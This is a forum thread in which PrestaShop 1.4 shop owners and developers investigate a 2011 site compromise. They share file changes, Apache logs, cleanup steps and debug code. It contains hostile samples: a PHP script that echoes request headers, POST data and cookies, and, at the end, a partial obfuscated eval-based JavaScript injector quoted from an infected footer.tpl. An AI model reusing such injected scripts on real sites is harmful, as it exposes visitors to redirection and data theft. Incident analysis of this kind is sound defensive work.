);}?>

<?php
error_reporting(0);

$empty = "";

function filt($data)
{
if (is_array($data)){
	$datanew = "";
	foreach ($data as $key=>$val)
	{
		$datanew .= htmlspecialchars(stripslashes($key)."=".stripslashes($val))."&";
	}
}
else {
	$datanew = $data;
	$datanew = htmlspecialchars(stripslashes($datanew));
}
return $datanew;
}

   if(isset($_SERVER['HTTP_FORWARDED_FOR'])) $DATA_HTTP_FORWARDED_FOR=filt($_SERVER['HTTP_FORWARDED_FOR']); else $DATA_HTTP_FORWARDED_FOR=$empty;
   if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])) $DATA_HTTP_X_FORWARDED_FOR=filt($_SERVER['HTTP_X_FORWARDED_FOR']); else $DATA_HTTP_X_FORWARDED_FOR=$empty;
   if(isset($_SERVER['HTTP_FROM'])) $DATA_HTTP_FROM=filt($_SERVER['HTTP_FROM']); else $DATA_HTTP_FROM=$empty;
   if(isset($_SERVER['HTTP_CLIENT_IP'])) $DATA_HTTP_CLIENT_IP=filt($_SERVER['HTTP_CLIENT_IP']); else $DATA_HTTP_CLIENT_IP=$empty;
   if(isset($_SERVER['HTTP_HTTP_VIA'])) $DATA_HTTP_HTTP_VIA=filt($_SERVER['HTTP_HTTP_VIA']); else $DATA_HTTP_HTTP_VIA=$empty;
   if(isset($_SERVER['HTTP_XROXY_CONNECTION'])) $DATA_HTTP_XROXY_CONNECTION=filt($_SERVER['HTTP_XROXY_CONNECTION']); else $DATA_HTTP_XROXY_CONNECTION=$empty;
   if(isset($_SERVER['HTTP_PROXY_CONNECTION'])) $DATA_HTTP_PROXY_CONNECTION=filt($_SERVER['HTTP_PROXY_CONNECTION']); else $DATA_HTTP_PROXY_CONNECTION=$empty;
   if(isset($_SERVER['HTTP_PROXY_USER'])) $DATA_HTTP_PROXY_USER=filt($_SERVER['HTTP_PROXY_USER']); else $DATA_HTTP_PROXY_USER=$empty;
   if(isset($_SERVER['HTTP_PC_REMOTE_ADDR'])) $DATA_HTTP_PC_REMOTE_ADDR=filt($_SERVER['HTTP_PC_REMOTE_ADDR']); else $DATA_HTTP_PC_REMOTE_ADDR=$empty;
   if(isset($_SERVER['HTTP_X_REMOTECLIENT_IP'])) $DATA_HTTP_X_REMOTECLIENT_IP=filt($_SERVER['HTTP_X_REMOTECLIENT_IP']); else $DATA_HTTP_X_REMOTECLIENT_IP=$empty;
   if(isset($_SERVER['HTTP_PROXY_PORT'])) $DATA_HTTP_PROXY_PORT=filt($_SERVER['HTTP_PROXY_PORT']); else $DATA_HTTP_PROXY_PORT=$empty;
   if(isset($_SERVER['HTTP_USER_AGENT'])) $DATA_HTTP_USER_AGENT=filt($_SERVER['HTTP_USER_AGENT']); else $DATA_HTTP_USER_AGENT=$empty;
   if(isset($_SERVER['HTTP_REFERER'])) $DATA_HTTP_REFERER=filt($_SERVER['HTTP_REFERER']); else $DATA_HTTP_REFERER=$empty;
   if(isset($_SERVER['HTTP_ACCEPT'])) $DATA_HTTP_ACCEPT=filt($_SERVER['HTTP_ACCEPT']); else $DATA_HTTP_ACCEPT=$empty;
   if(isset($_SERVER['HTTP_CONNECTION'])) $DATA_HTTP_CONNECTION=filt($_SERVER['HTTP_CONNECTION']); else $DATA_HTTP_CONNECTION=$empty;
   if(isset($_SERVER['GATEWAY_INTERFACE'])) $DATA_GATEWAY_INTERFACE=filt($_SERVER['GATEWAY_INTERFACE']); else $DATA_GATEWAY_INTERFACE=$empty;
   if(isset($_SERVER['REQUEST_METHOD'])) $DATA_REQUEST_METHOD=filt($_SERVER['REQUEST_METHOD']); else $DATA_REQUEST_METHOD=$empty;
   if(isset($_COOKIE)) $_COOKIE=filt($_COOKIE); else $_COOKIE=$empty;
   if(isset($_POST)) $_POST=filt($_POST); else $_POST=$empty;

$data = "<pre>REQUEST_INFO_PAGE_4896485_CODE
REMOTE_ADDR=".filt($_SERVER['REMOTE_ADDR'])."
HTTP_CLIENT_IP=".$DATA_HTTP_CLIENT_IP."
HTTP_X_FORWARDED_FOR=".$DATA_HTTP_X_FORWARDED_FOR."
HTTP_X_FORWARDED=".$DATA_HTTP_FORWARDED_FOR."
HTTP_X_COMING_FROM=
HTTP_FORWARDED_FOR=".$DATA_HTTP_FORWARDED_FOR."
HTTP_FORWARDED=
HTTP_COMING_FROM=
HTTP_VIA=".$DATA_HTTP_HTTP_VIA."
HTTP_XROXY_CONNECTION=".$DATA_HTTP_XROXY_CONNECTION."
HTTP_PROXY_CONNECTION=".$DATA_HTTP_PROXY_CONNECTION."
HTTP_USER_AGENT=".$DATA_HTTP_USER_AGENT."
HTTP_ACCEPT=".$DATA_HTTP_ACCEPT."
HTTP_CONNECTION=".$DATA_HTTP_CONNECTION."
GATEWAY_INTERFACE=".$DATA_GATEWAY_INTERFACE."
REQUEST_METHOD=".$DATA_REQUEST_METHOD."
HTTP_REFERER=".$DATA_HTTP_REFERER."
POST=".$_POST."
COOKIE=".$_COOKIE."
</pre>
   ";

echo $data;
?>

Share this post


Link to post
Share on other sites

Hi,

 

Same problem in 1.4.4 on a local install of prestashop.

 

My apache shows that the her.php file appeared just after a serie of admin actions. Here are the last :

 

 

127.0.0.1 - - [23/Aug/2011:23:27:54 +0200] "POST [...my_local_admin]/ajax.php HTTP/1.1" 200 - "http://localhost/[...my_local_admin]/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0"

127.0.0.1 - - [23/Aug/2011:23:27:58 +0200] "POST [...my_local_admin]/ajax.php?toggleScreencast HTTP/1.1" 200 - "http://localhost/[...my_local_admin]/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0"

127.0.0.1 - - [23/Aug/2011:23:27:55 +0200] "POST /[...my_local_admin]/index.php?tab=AdminModules&token=c76a0756b0d565653ca9aabf3e5a35e HTTP/1.1" 200 301411 "http://localhost/[...my_local_admin]/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0"

---- and now the her php file------

127.0.0.1 - - [23/Aug/2011:23:27:59 +0200] "GET /[...my_local_module_folder]/her.php HTTP/1.1" 200 - "http://localhost/_____Gedone/_Cap_Expresso/html/www2.capexpresso.com/admincap/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0"

 

But i can't find her.php in my modules folder...

 

And now my IE (that i rarely open) opens itself on http://ads.eorezo.com/cgi-bin/advert/getads?x_......

 

My two other sites (1.3.6 not upgraded to 1.4)on online servers don't seem to be affected by this problem...

Share this post


Link to post
Share on other sites

same problem:

- e66943f1495e1631affdbddae8398209.php file in the download and upload folder

- script in the footer.tpl

 

my shop ver is 1.4.2.5

 

is there any modification that is have to check?

 

if you find the solution for this hack, please tell us how can we protect the site not with just a new release (it not possible for me to update to a newer release)

 

regards,

Gabor

Share this post


Link to post
Share on other sites

Same problem... interesting thing is I have a few prestashops on my server in the same, root directory but in different folders, just one of these was attacked (PS.1.4.3)...

Share this post


Link to post
Share on other sites

would you advise going back to an older version?

 

replaced footer.tpl

removed several dogdy looking image files for house, pharmacy, car sales in Modules\avoir\ folder??!!

index.php had been amended

smarty.v2 removed and now reinstated

Share this post


Link to post
Share on other sites

I forgot to mention, it happened to me before, a month ago!, I restored the whole shop and database.

Unfortunately, I didn't check if there is any strange additional file or modification or not.

Share this post


Link to post
Share on other sites

I did check for other added or modified files when I discovered the hack, by searching for all files with a recent timestamp. The only, apparent, changes I could find have already been reported in this topic.

In short, these are the changes:

 

1)a script is added to the footer.tpl file in the active theme folder

 

2)a php file is created in both /upload and /download folders

 

3).htaccess file in /download folder is deleted

 

4) tools/smarty/compile, tools/smarty/cache and tools/smarty_v2 are deleted (I haven't checked this myself)

 

5) if you're lucky enough to catch it, there is a her.php file in your /modules folder. But this file deletes itself after the hack attempt.

 

I would advise to check all this in your own installation and if needed restore a backup of your footer.tpl, delete the alien php files, restore .htaccess file in /download folder (not necessary if this folder is empty) and restore the smarty folders.

 

In addition, it is also important to change your password for access of your BO (though I think this info is send encrypted to the hackers but just to be safe) and to change the username/password of your database access (and change this in your BO accordingly).

 

Also, recompile and clear the cache (enable 'Force compile' and disable 'Cache' in your 'Preferences' tab in your BO and do a refresh of your website; don't forget to revert the settings afterwards).

 

And hopefully the Prestashop developers will find out the source of all this quickly.

Share this post


Link to post
Share on other sites

same problem:

- e66943f1495e1631affdbddae8398209.php file in the download and upload folder

- script in the footer.tpl

 

Idem with 1.4.4.0 on local install.

Share this post


Link to post
Share on other sites

same problem:

- e66943f1495e1631affdbddae8398209.php file in the download and upload folder

- script in the footer.tpl

 

Idem with 1.4.4.0 on local install.

 

Same issues here. Found extra files in both download and upload folders. Tried to revert to older backup files and it added an .htaccess to one of the folders.

 

What is the status of this situation? Does PS have a solution? This is very serious.

Share this post


Link to post
Share on other sites

We were affected as well. v1.4.3.

 

Can confirm that smarty_v2 was deleted, there was the extra files in download and upload and the footer.tpl was changed (it wasn't the default template either which was interesting).

 

My install of PS had all the modules so I'm going through and deleting the unused ones.

Share this post


Link to post
Share on other sites

server log at about 5 min. before and 5 min after her.php(17:26:00)

Hope it is helpful

 

Edit:

Domain name is changed. Just for security

log.txt

Share this post


Link to post
Share on other sites

Hi All,

I'm new to PrestaShop and just made my shop live, I was just browsing the forum and come across this Hack

I checked my files and it seems I have the same problem.

 

I deleted the .php files in the upload download folder got rid of the strange code inside the footer.tpl

 

it appears my main htaccess file was not altered added the htaccess redir as suggested in redit

 

I'm considering a new install but, what if I get infected again?

 

any advice

 

tks

 

jesan

Share this post


Link to post
Share on other sites

Looks like there are a few similair calls made. however, it's 3 hours between.

 

xx.xxx.xxx.xxx - - [23/Aug/2011:13:27:30 +0200] "POST /admindir/index.php?tab=AdminModules&token=8a94cca32ee3c07af0bf7322428e09cc HTTP/1.1" 200 29229 "http://www.domainname.com/admindir/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17"

 

yy.yyy.yy.yy - - [23/Aug/2011:16:33:36 +0200] "GET /sv/hem HTTP/1.1" 200 25448 "http://www.google.se/url?sa=t&source=web&cd=5&ved=0CEAQFjAE&url=http%3A%2F%2Fwww.domainname.com%2F&rct=j&q=domainname.com%2Bher.php&ei=rLpTTu-PG4aJrAeV6t3DDg&usg=AFQjCNFhhEF9BsO6NxutBpe4kvvZNPG1iA&cad=rjt" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0"

Share this post


Link to post
Share on other sites

I got afected too.

so sad =(

:angry:

a lot of lost and resourses wasted.

=(

If need anything to solve this let me know.

=)

 

 

Looks like there are a few similair calls made. however, it's 3 hours between.

 

xx.xxx.xxx.xxx - - [23/Aug/2011:13:27:30 +0200] "POST /admindir/index.php?tab=AdminModules&token=8a94cca32ee3c07af0bf7322428e09cc HTTP/1.1" 200 29229 "http://www.domainname.com/admindir/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17"

 

yy.yyy.yy.yy - - [23/Aug/2011:16:33:36 +0200] "GET /sv/hem HTTP/1.1" 200 25448 "http://www.google.se/url?sa=t&source=web&cd=5&ved=0CEAQFjAE&url=http%3A%2F%2Fwww.domainname.com%2F&rct=j&q=domainname.com%2Bher.php&ei=rLpTTu-PG4aJrAeV6t3DDg&usg=AFQjCNFhhEF9BsO6NxutBpe4kvvZNPG1iA&cad=rjt" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0"

Share this post


Link to post
Share on other sites

I got afected too.

so sad =(

:angry:

a lot of lost and resourses wasted.

=(

If need anything to solve this let me know.

=)

 

My guess at this time is that we are dealing with some kind of malware, that has infected your computer, this malware then uses the module upload feature in Prestashop to upload this file.

 

I would suggest the following until a more permanent fix is made.

 

1. Either remove write permission on modules folder, or uncomment the following code from

/admin/tabs/adminModules.php

function extractArchive($file)
{
/*
	global $currentIndex;
	$success = false;
	if (substr($file, -4) == '.zip')
	{
		if (!Tools::ZipExtract($file, _PS_MODULE_DIR_))
			$this->_errors[] = Tools::displayError('Error while extracting module (file may be corrupted).');
	}
	else
	{
		$archive = new Archive_Tar($file);
		if ($archive->extract(_PS_MODULE_DIR_))
			$success = true;
		else
			$this->_errors[] = Tools::displayError('Error while extracting module (file may be corrupted).');
	}

	@unlink($file);
	if ($success)
		Tools::redirectAdmin($currentIndex.'&conf=8'.'&token='.$this->token);
*/
}

2. Make sure your computer is safe! Scan for malware/viruses, use an up to date antivirus software. Make sure you have a firewall installed, even if you are behind a router, it is good to have a software firewall, especially if you use a wireless network at home or at work.

Share this post


Link to post
Share on other sites

Test upgrading to SVN8151 version and saw the problem. Don't think its from localhost machine.

 

Observation:

her.php file added

upload dir with additional file

dowload dir with additional file

themes/prestashop/footer.tpl altered

smarty/cache/* changed

smarty/compile/* changed

 

Categories FO not showing

3rd party homecarousel not working anymore

Share this post


Link to post
Share on other sites

My shop is not affected. I haven't the file her.php, nor the file footer.tpl affected.

 

My hosting is Spanish and my shop is only available in Spanish.

 

It is odd that affected stores, and sometimes not. Could it be that the virus appears for a module such as Facebook?.

 

Prestashop 1.4.4

Share this post


Link to post
Share on other sites

OK this has just happen to me again.

 

Yesterday my store went down and after reading this thread, I deleted the php file in the upload/download folders and reverted to the original footer file. I also had to reinstall the tools/smarty/compile and tools/smarty/cache folders along with smarty_v2 folder. After this everything seemed OK.

 

This morning exactly the same thing has happened again. This needs sorting ASAP.

Share this post


Link to post
Share on other sites

I have just had my site restored by my host Vidahost I had tried to replace the tools directory and I still had problems with the log in page as there was a security error coming up in browser.

 

So the only way that would eliminate this was to restore all the files and everything seems back to normal now.

 

Regards,

 

Mark.

Share this post


Link to post
Share on other sites

I checked my store files and it seems I have the same problem.

 

I deleted the .php files in the upload and download folder and restored footer.tpl

i have also deleted all files in smarty/cache and smarty/compile

 

I did not find the file her.php in modules folder

 

prestashop 1.4.4.0

Share this post


Link to post
Share on other sites

As Mike said, the whole team is working on this issue.

 

We are trying to fix it as fast as possible.

 

We will keep you informed of any progress.

 

Be assured that we do not take this problem lightly and that we are totally dedicated to fixing it.

Share this post


Link to post
Share on other sites

Just checked my sites & my clients sites & it seems to be only 1.4.3 & 1.4.4 affected so far. One site is in maintenance mode & was still affected.

I'm now going to try a clean install on wamp & see what the logs say after.

Share this post


Link to post
Share on other sites

Hello, can you search in your full log apache the word "her.php" and copy all found lines here ? If you are under linux :

cat /path/to/your/apache/log | grep "her.php"

Share this post


Link to post
Share on other sites

Hi all,

 

I run an audit on my customers and partners.

 

I hope that isn't my menu but above all isn't PrestaShop ! blink.gif

 

Ju'

Share this post


Link to post
Share on other sites

Same problems here!

The shop went offline after my smarty_v2 folder content was removed.

I can't find her.php.

 

Already any suggestions for a fix?

Share this post


Link to post
Share on other sites

Hello,

for all people affected by this problem, if possible we need your apache log to check how this issue happened on your site and try to correct it the faster possible. You can send your logs to Carl.

 

Regards

Share this post


Link to post
Share on other sites

Last entry line in Apache log after local install on wamp

 

127.0.0.1 - - [24/Aug/2011:10:31:57 +0200] "GET /test_virus/modules/her.php HTTP/1.1" 200 -

 

Then the her.php has gone but footer.tpl has been modified.

 

PrestaShop 1.4.4

 

BTW this was a clean install with no extra modules. Zip downloaded from PrestaShop on 20/08/11

Edited by dazzza (see edit history)

Share this post


Link to post
Share on other sites

Hello,

for all people affected by this problem, if possible we need your apache log to check how this issue happened on your site and try to correct it the faster possible. You can send your logs to Carl.

 

Regards

Attached is my log from this morning.

 

I installed niceforms and jbx_menu modules yesterday onto other sites on local host - these sites use the default theme and weren't affected.

 

I installed jbx_menu on this site this morning and shortly after the footer.tpl file in a custom theme was affected.

 

I can upload earlier logs if necessary - there is no other reference to her.php in my logs.

PurpleEdge.zip

Share this post


Link to post
Share on other sites

I'm using jbx_menu as well...

Can all the people who have posted here and encountered the same problem confirm that they are using this menu?

 

I use the blocktopmenu from JBX too. No hack at all. BUT I run on an IIS (no Apache) which has no .htaccess so the script will not work, I too use a module called protect.tpl from samhda. It helps to protect your theme if script name are not known...

 

I use Geo-Targeting to block all the countries I don't sell to and for known bad-behaviour countries (listed on project honeypot or other similar.)

 

I run several bot-traps and firewall security on my server, because I've had a hacked server in the past with php-BB-forum software.

 

The security theme is a wide complexe theme and it does not mean that file xy was hacked, that this file was the reason for the hack. In most cases some other open JS are the reason for intrusions AND no software is really secure...

You must make your server secure to be not hacked.

Share this post


Link to post
Share on other sites

I can upload earlier logs if necessary - there is no other reference to her.php in my logs.

 

 

I found it on line 256:

127.0.0.1 - - [24/Aug/2011:09:44:13 +1000] "GET /ozhealth_local/modules/her.php HTTP/1.1" 200 -

 

 

Thanks for all these details.

 

 

Best regards,

Share this post


Link to post
Share on other sites

Hi

 

One of my costumer has the same problem.

I restored his site.

 

Right now I don't have server logs to look, when and how the her.php file was added.

Share this post


Link to post
Share on other sites

This is my test finding.

 

Using SVN version_8151 to do a fresh installation (localhost)

 

Immediately after installation...access FO ---> no her.php file found

Then try access to BO by keying in password ---> her.php file was generated

No other files found in upload and download directory

Footer.tpl not altered

==continuing with further monitoring & testing

 

 

Please find attached access.log for your investigation.

access.txt

Share this post


Link to post
Share on other sites

Hi,

I have 3 stores

 

1 has been infected

version 1.4.3

site was in maintenance mode

new php files in upload and download

smarty_v2 erased

footer.tpl altered

can't find her.php

Share this post


Link to post
Share on other sites

Hello,

for those who can reproduce this bug in localhost, can you please remade an install, and before you do any action on your prestashop please add the following code :

		if ($_POST)
	{
		$fd = fopen(_PS_ROOT_DIR_.'/log_her.txt', 'a');
		fwrite($fd, var_export($_POST, true).var_export($_SERVER, true)."\n");
		fclose($fd);
	}

bellow the code

	function __construct()
{

in file admin/tabs/adminModules.php. Once you have noticed the presence of her.php infection, please send me per MP the log file her_log.txt in your Prestashop root folder, thank you :D

Share this post


Link to post
Share on other sites

I have the problem too on a 1.4.4 Prestashop.

Found it yesterday at about 6pm Paris time.

I removed my active theme directory by FTP, I uploaded a clean one, it worked again, but this morning it was infected again.

Share this post


Link to post
Share on other sites

I got hacked too, website comes up with error 500.

 

I deleted the sus files as mentioned but I still get error 500.

 

How do I fix to get my client back online?

 

error log:

 

[24-Aug-2011 17:22:00] PHP Fatal error: require_once() [<a href='function.require'>function.require</a>]: Failed opening required '/home/thumpmus/public_html/tools/smarty_v2/Smarty.class.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/thumpmus/public_html/config/smarty.config.inc.php on line 33

Share this post


Link to post
Share on other sites

I'm curious for those infected what operating system you use ?

 

But as said Raphael, it's coming after the call of AdminModule

 

We keep you informed about any news.

 

Best regards

Share this post


Link to post
Share on other sites

I got hacked too, website comes up with error 500.

 

I deleted the sus files as mentioned but I still get error 500.

 

How do I fix to get my client back online?

 

error log:

 

[24-Aug-2011 17:22:00] PHP Fatal error: require_once() [<a href='function.require'>function.require</a>]: Failed opening required '/home/thumpmus/public_html/tools/smarty_v2/Smarty.class.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/thumpmus/public_html/config/smarty.config.inc.php on line 33

 

Hi,

 

Try to re-upload your prestashop.

And check:

- /tools/smarty_v2/ exists

- /modules/her.php do NOT exists

 

Best regards,

Share this post


Link to post
Share on other sites

I'm curious for those infected what operating system you use ?

 

But as said Raphael, it's coming after the call of AdminModule

 

We keep you informed about any news.

 

Best regards

 

Hi Vincent, I am using a linux operating system if that helps.

 

Regards,

 

Mark.

Share this post


Link to post
Share on other sites

I'm curious for those infected what operating system you use ?

 

I'm working on OSX 10.5.8

and for hosting this is Linux Apache/2.2.14 (Unix) PHP: 5.2.5 MySQL: 5.1.44

 

 

Thanks

Share this post


Link to post
Share on other sites

Hello,

for those who can reproduce this bug in localhost, can you please remade an install, and before you do any action on your prestashop please add the following code :

		if ($_POST)
	{
		$fd = fopen(_PS_ROOT_DIR_.'/log_her.txt', 'a');
		fwrite($fd, var_export($_POST, true).var_export($_SERVER, true)."\n");
		fclose($fd);
	}

bellow the code

	function __construct()
{

in file admin/tabs/adminModules.php. Once you have noticed the presence of her.php infection, please send me per MP the log file her_log.txt in your Prestashop root folder, thank you :D

Share this post


Link to post
Share on other sites

Also infected on at least two sites (1.4.4.0), but apparently not all my PS sites. But I have to ftp access at the office... One of the infected sites has absolutety no additional modules (it's a test site).

 

Hosted on a Linux Debian OS. Websites uploaded from my Windows 7 (with MS Essential Security) and Filezilla.

Share this post


Link to post
Share on other sites

For those who can reproduce this bug at localhost, if you can provide us an access ssh to your server BEFORE just after a new install, this would be a great help. You can send it to me per PM.

 

Regards

Share this post


Link to post
Share on other sites

Windows 7 OS.

Prestashop 1.4.4

 

My site was fine at 6:00pm 8/23 then at 7:58 pm 5/23 I noticed my site isn't functioning properly.

 

I sent a ticket to my host and this was found.

 

Removed:

/home/sfbm/public_html/videos/wp-content/themes/zzz/scripts/cache/dd58e9270114ad1f95c0e3da514a2b6c.php: PHP.Hide.UNOFFICIAL FOUND

/home/sfbm/public_html/videos/wp-content/themes/zzz/scripts/cache/7e30804b68501ac775c35e1db21b502f.php: PHP.Hide.UNOFFICIAL FOUND

/home/sfbm/public_html/webstore/download/647226b6ef10264fb0c2c5336a924ef7.php: Atomicorp.honeypot.hex.php.cmdshell.unclassed.338.UNOFFICIAL FOUND

/home/sfbm/public_html/webstore/upload/647226b6ef10264fb0c2c5336a924ef7.php: Atomicorp.honeypot.hex.php.cmdshell.unclassed.338.UNOFFICIAL FOUND

 

The attacker was able to access my account by using your store's admin interface.

 

/usr/local/apache/domlogs/sfbm/-----.com: IP ADDRESS - - [23/Aug/2011:19:18:12 -0500] "POST /webstore/admin/ajax.php HTTP/1.1" 200 20 "http://-----.com/webstore/admin/index.php?tab=AdminTools&token=a14d47e372b19cd728aace" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/IP ADDRESS Safari/ADDRESS"

 

 

Now my whole ajax categories and cart is messed up. Site doesn't function the same anymore.

 

505tfl.jpg

 

Detected when I was browsing my store.

 

UPDATE: 8/24 3:32 AM

 

dzoqv.jpg

Share this post


Link to post
Share on other sites

Guys

 

i'm one of the people been hacked

here is what i found:

 

92.200.123.234 - - [24/Aug/2011:05:28:44 -0400] "GET /cms.php?id_cms=1 HTTP/1.1" 503 1220 "-" "Mozilla/5.0 (000000000; 00000 000 00 0 000000) DDDDDDDDDDDDDDDDDD DDDDDDD DDDD DDDDDD DDDDDDDDDDD DDDDDDDDDDDDD"

92.200.123.234 - - [24/Aug/2011:05:28:44 -0400] "GET /themes/xx/css/maintenance.css HTTP/1.1" 200 623 "-" "Mozilla/5.0 (000000000; 00000 000 00 0 000000) DDDDDDDDDDDDDDDDDD DDDDDDD DDDD DDDDDD DDDDDDDDDDD DDDDDDDDDDDDD"

92.200.123.234 - - [24/Aug/2011:05:28:44 -0400] "GET /img/admin/tab-tools.gif HTTP/1.1" 200 351 "-" "Mozilla/5.0 (000000000; 00000 000 00 0 000000) DDDDDDDDDDDDDDDDDD DDDDDDD DDDD DDDDDD DDDDDDDDDDD DDDDDDDDDDDDD"

92.200.123.234 - - [24/Aug/2011:05:28:44 -0400] "GET /img/logo.jpg HTTP/1.1" 200 3683 "-" "Mozilla/5.0 (000000000; 00000 000 00 0 000000) DDDDDDDDDDDDDDDDDD DDDDDDD DDDD DDDDDD DDDDDDDDDDD DDDDDDDDDDDDD"

92.200.123.234 - - [24/Aug/2011:05:28:45 -0400] "GET /img/favicon.ico HTTP/1.1" 200 1148 "-" "Mozilla/5.0 (000000000; 00000 000 00 0 000000) DDDDDDDDDDDDDDDDDD DDDDDDD DDDD DDDDDD DDDDDDDDDDD DDDDDDDDDDDDD"

92.200.123.234 - - [24/Aug/2011:05:28:51 -0400] "GET /product.php?id_product=xx HTTP/1.1" 503 1189 "-" "Mozilla/5.0 (000000000; 00000 000 00 0 000000) DDDDDDDDDDDDDDDDDD DDDDDDD DDDD DDDDDD DDDDDDDDDDD DDDDDDDDDDDDD"

 

the ip address i lookup and found this:

 

% This is the RIPE Database query service.

% The objects are in RPSL format.

%

% The RIPE Database is subject to Terms and Conditions.

% See http://www.ripe.net/db/support/db-terms-conditions.pdf

 

% Information related to '92.200.0.0 - 92.220.255.255'

 

inetnum: 92.200.0.0 - 92.220.255.255

netname: QSC-WHOLESALE-1

descr: QSC AG Dynamic IP Addresses

country: DE

admin-c: QSC1-RIPE

tech-c: QSC1-RIPE

status: ASSIGNED PA

mnt-by: QSC-NOC

mnt-lower: QSC-NOC

remarks: ***********************************

remarks: * For spam, portscans, hacks, ... *

remarks: * please contact to *****@qsc.de *

remarks: ***********************************

changed: *************@NOSPAM.qsc.de 20091021

source: RIPE

 

role: QSC Internet Services

address: QSC AG

address: Mathias-Brueggen-Str. 55

address: D-50829 Koeln

address: Germany

phone: +49 221 66 98 000

fax-no: +49 221 66 98 009

e-mail: *****@qsc.de

remarks: ********************************************

remarks: QSC AG - Network Design Department

remarks:

remarks: Fuer Fragen zu SPAM, Portscans, Trojanern

remarks: usw. wenden Sie sich bitte an *****@qsc.de

remarks:

remarks: To report SPAM/UCE/Portscans/Hacks please

remarks: contact *****@qsc.de.

remarks:

remarks: For peering requests, BGP policy changes

remarks: etc. contact *******@NOSPAM.qsc.de. For

remarks: Routing issues ******@NOSPAM.qsc.de. Please

remarks: remove NOSPAM. from email address.

remarks: ********************************************

admin-c: RH168-RIPE

tech-c: RH168-RIPE

tech-c: ARB-RIPE

tech-c: MH6797-RIPE

tech-c: BF359-RIPE

tech-c: MD1900-RIPE

tech-c: GHM-RIPE

tech-c: CV1903

nic-hdl: QSC1-RIPE

mnt-by: QSC-NOC

changed: *************@NOSPAM.qsc.de 20080605

changed: *************@NOSPAM.qsc.de 20081027

changed: **************@NOSPAM.qsc.de 20090511

source: RIPE

 

% Information related to '92.192.0.0/11AS20676'

 

route: 92.192.0.0/11

descr: QSC AG

origin: AS20676

mnt-by: QSC-NOC

mnt-lower: QSC-NOC

changed: ************@NOSPAM.qsc.de 20071017

source: RIPE

Share this post


Link to post
Share on other sites

Local host site on wamp connects to erabaglanti.ka.hn

& the little square at the bottom is an iframe

 

Hi,

 

Me too !!

 

PS 1.4.1.0

Share this post


Link to post
Share on other sites

Just checked my sites & my clients sites & it seems to be only 1.4.3 & 1.4.4 affected so far. One site is in maintenance mode & was still affected.

I'm now going to try a clean install on wamp & see what the logs say after.

Hi

 

Infected as well, had to put the shop offline

I'm on 1.4.2.5

 

can we have a progress report from the presta team?

 

regards Pieter

Share this post


Link to post
Share on other sites

Hello,

for those who can reproduce this bug in localhost, can you please remade an install, and before you do any action on your prestashop please add the following code :

		if ($_POST)
	{
		$fd = fopen(_PS_ROOT_DIR_.'/log_her.txt', 'a');
		fwrite($fd, var_export($_POST, true).var_export($_SERVER, true)."\n");
		fclose($fd);
	}

bellow the code

	function __construct()
{

in file admin/tabs/adminModules.php. Once you have noticed the presence of her.php infection, please send me per MP the log file her_log.txt in your Prestashop root folder, thank you :D

 

Can you please read the quote. If someone can do all this, it would grant us great help.

Share this post


Link to post
Share on other sites

Hi our website also heacked. Now i have to stoped acces to the website, can anybody say the clear solution?

Share this post


Link to post
Share on other sites

For anyone who finds a her.php file under their modules directory, you should do the following:

- Check the file creation time, write this down and delete the file from your server.

- Go to your apache raw access logs. You should be able to access it using hosting control panel.

- Find the line that corresponds to the file creation time you wrote down earlier.

- Copy the section starting 5 minutes before to 5 minutes after. Save it in a text file and share it here.

This data would help identify the root of the problem.

 

To see if you have been attacked, check the following:

- Is there any php file under your uploads or downloads directory apart from index.php?

- Is there a strange javascript at the end of your footer.tpl file?

 

If any of the above happens, change your mysql username and password.

 

 

I could not find the her.php file, but my footer.tpl surely had the strange javascript at the bottom.With some weird file in upload and download directories.

 

Site is still up though,but the add to cart buttons didnt work properly and got a security cert warning from ssl pages showing a weird ssl certificate which was not mine.

 

All slideshows have stopped working.Cannot order products because add to cart does not work anymore.

Share this post


Link to post
Share on other sites

Same php files in /download and /upload folder. Footer.tpl in theme folder changed.

her.php in module folder not exist.

Prestashop 1.4.3

Share this post


Link to post
Share on other sites

I also got infected by js.Rediretor-IY Tjn yesterday. I'm running 1.4.4 shop but did not find the her.php file. I ran my page source and found this at the bottom....

 

"<script>String.prototype.asd=function(){return

 

String.fromCharCode;};Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('as'))throw 1;}catch(q){zxc={};}

 

v=document.createTextNode('asd');var s="";for(i in v)if(i=='childNodes')o=v.length+1;o*=2;e=eval;m=[120-o,99-o,116-

 

o,34-o,102-o,34-o,63-o,34-o,112-o,103-o,121-o,34-o,70-o,99-o,118-o,103-o,42-o,43-o,61-o,120-o,99-o,116-o,34-o,122-o,63-

 

o,85-o,118-o,116-o,107-o,112-o,105-o,48-o,104-o,116-o,113-o,111-o,69-o,106-o,99-o,116-o,69-o,113-o,102-o,103-o,42-o,79-

 

o,99-o,118-o,106-o,48-o,104-o,110-o,113-o,113-o,116-o,42-o,102-o,48-o,105-o,103-o,118-o,70-o,99-o,118-o,103-o,42-o,43-

 

o,49-o,52-o,43-o,45-o,59-o,57-o,43-o,61-o,34-o,120-o,99-o,116-o,34-o,123-o,63-o,85-o,118-o,116-o,107-o,112-o,105-o,48-

 

o,104-o,116-o,113-o,111-o,69-o,106-o,99-o,116-o,69-o,113-o,102-o,103-o,42-o,102-o,48-o,105-o,103-o,118-o,74-o,113-o,119

 

-o,116-o,117-o,42-o,43-o,45-o,59-o,57-o,43-o,61-o,102-o,113-o,101-o,119-o,111-o,103-o,112-o,118-o,48-o,121-o,116-o,107-

 

